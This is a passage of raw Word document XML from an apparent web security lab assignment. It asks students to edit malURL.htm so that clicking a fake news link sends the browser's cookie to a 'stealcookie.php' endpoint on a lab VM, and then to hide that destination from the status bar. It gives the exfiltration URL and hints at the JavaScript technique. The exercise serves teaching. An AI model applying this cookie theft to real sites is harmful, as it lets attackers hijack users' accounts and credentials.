        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>On setgetcookie.html, fill the username/password form, click “Set cookie” and then</w:t>
      </w:r>
      <w:r w:rsidR="00B26349" w:rsidRPr="00B26349">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26349">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“Show cookie” buttons to make sure this website set a cookie to your browser</w:t>
      </w:r>
      <w:r w:rsidR="00541DC5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFDAA63" w14:textId="77777777" w:rsidR="00541DC5" w:rsidRDefault="00315852" w:rsidP="00D14BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00757927" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>o back and click the “Then, visit this page!” link to visit malURL.htm</w:t>
      </w:r>
      <w:r w:rsidR="00B61CAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005F0D85" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00757927" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You will see two links on this malURL.htm page as shown below, but both of them do</w:t>
      </w:r>
      <w:r w:rsidR="005F0D85" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00757927" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>not work right now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717E86EE" w14:textId="77777777" w:rsidR="003B3BD1" w:rsidRDefault="006D469E" w:rsidP="003B3BD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F8652B0" wp14:editId="3F1F154F">
            <wp:extent cx="4810125" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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810125" cy="1952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E0B591D" w14:textId="77777777" w:rsidR="00090E47" w:rsidRDefault="00703430" w:rsidP="00C72239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">hange the malURL.htm of your XSS Web application, so that when you click the </w:t>
      </w:r>
      <w:r w:rsidR="001F5647">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>FIRST</w:t>
      </w:r>
      <w:r w:rsidR="00623E41" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“EMC's RSA Security Breach May Cost Bank Customers $100 Million” link, the</w:t>
      </w:r>
      <w:r w:rsidR="00623E41" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cookie stored on your browser for this website will be sent to an attacker’s server (that’s</w:t>
      </w:r>
      <w:r w:rsidR="00623E41" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">my </w:t>
      </w:r>
      <w:r w:rsidR="00612A69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) using an HTTP GET request with the following format:</w:t>
      </w:r>
      <w:r w:rsidR="00623E41" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346682BB" w14:textId="77777777" w:rsidR="00D62BFC" w:rsidRDefault="00D86FC9" w:rsidP="00090E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00D42655" w:rsidRPr="00C42527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.65.128/XSS/stealcookie.php?info=COOKIES</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C21B24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB20790" w14:textId="77777777" w:rsidR="00E5128D" w:rsidRDefault="00E5128D" w:rsidP="00090E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D91207" w14:textId="77777777" w:rsidR="00E5128D" w:rsidRDefault="009709B4" w:rsidP="009709B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: you </w:t>
      </w:r>
      <w:r w:rsidR="00745B0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r w:rsidR="00C546B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the above </w:t>
      </w:r>
      <w:r w:rsidR="00BE4727">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and format</w:t>
      </w:r>
      <w:r w:rsidR="00CF5057">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your own IP address but not mine</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, so that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stealcookie.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="00E5586F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r w:rsidR="0051573C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00374A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> can receive and verify </w:t>
      </w:r>
      <w:r w:rsidR="00B82F0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> submission record. Here, COOKIES means</w:t>
      </w:r>
      <w:r w:rsidR="00B3685C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the complete cookie content save on your browser for this website (i.e.,</w:t>
      </w:r>
      <w:r w:rsidR="00D7104B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Pr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>), so it should include a pair of username and password values. The</w:t>
      </w:r>
      <w:r w:rsidR="00F95C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stealcookie.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D2751">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is also included in XSS.tar.gz</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9573E7" w14:textId="77777777" w:rsidR="008B2368" w:rsidRDefault="008B2368" w:rsidP="009709B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="298C4B32" w14:textId="77777777" w:rsidR="000634F8" w:rsidRDefault="000634F8" w:rsidP="000634F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hint: there could be multiple solutions. One solution is to simply replace the current</w:t>
      </w:r>
      <w:r w:rsidR="00C11A76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> value ("#") of the first link in malURL.htm with a piece of JavaScript code;</w:t>
      </w:r>
      <w:r w:rsidR="00DB4123">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nothing else needs to be changed. Note that if you use this solution and if you move</w:t>
      </w:r>
      <w:r w:rsidR="00DB4123">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">the mouse over the link, you may notice that my </w:t>
      </w:r>
      <w:r w:rsidR="00B64C07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> address information is shown on the status bar of your browser. So, a security conscious user may</w:t>
      </w:r>
      <w:r w:rsidR="00DB4123">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>notice this and may not be tricked to click the link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A2A7E6" w14:textId="77777777" w:rsidR="0006376F" w:rsidRDefault="0006376F" w:rsidP="008C0773">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3872"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062D94AF" w14:textId="5F1F08D4" w:rsidR="000E23BC" w:rsidRDefault="000E23BC" w:rsidP="008C0773">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3872"/>
        </w:tabs>
        <w:ind w:left="10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Question </w:t>
      </w:r>
      <w:r w:rsidR="008B25D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: (15 pts)</w:t>
      </w:r>
      <w:r w:rsidR="008C0773">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DADB70C" w14:textId="77777777" w:rsidR="000E23BC" w:rsidRDefault="00F51FDA" w:rsidP="00C77A79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2589D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What are your changes to the malURL.htm file? What are your verification results? Explain this XSS</w:t>
      </w:r>
      <w:r w:rsidR="00C67EF9" w:rsidRPr="00A2589D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A2589D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54070D" w14:textId="77777777" w:rsidR="00EE6F77" w:rsidRDefault="00EE6F77" w:rsidP="000D09C3">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9F4056" w14:textId="77777777" w:rsidR="003217FA" w:rsidRDefault="003217FA" w:rsidP="000D09C3">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E73E914" w14:textId="77777777" w:rsidR="000D09C3" w:rsidRDefault="00044E3C" w:rsidP="004E4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Make the attack stealthier, so that when you move the mouse over the second link, my</w:t>
      </w:r>
      <w:r w:rsidR="00F65DB5" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B253FD" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> address information will not be shown on the status bar of</w:t>
      </w:r>
      <w:r w:rsidR="00E63604" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>your browser. In this case, a security conscious user may also be tricked to click the</w:t>
      </w:r>
      <w:r w:rsidR="003D6B83" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>second link. Still, when you click this second “EMC's RSA Security Breach May Cost</w:t>
      </w:r>
      <w:r w:rsidR="008222BA" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bank Customers $100 Million” link, the cookie stored on your browser for this website</w:t>
      </w:r>
      <w:r w:rsidR="006B2FFC" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">will be sent to an attacker’s server (that’s my </w:t>
      </w:r>
      <w:r w:rsidR="002449FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) using an HTTP GET</w:t>
      </w:r>
      <w:r w:rsidR="0010725A" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>request with the following format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC162D5" w14:textId="77777777" w:rsidR="003E6374" w:rsidRDefault="00D86FC9" w:rsidP="004D6FEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00E845CA" w:rsidRPr="00C42527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.65.128/XSS/stealcookie.php?info=COOKIES</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003E6374">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F9528F" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="00ED715E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE0EEDE" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidR="002F2B03" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r w:rsidR="002F2B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>need to</w:t>
      </w:r>
      <w:r w:rsidR="002F2B03" w:rsidRPr="009709B4">
        <w:rPr>
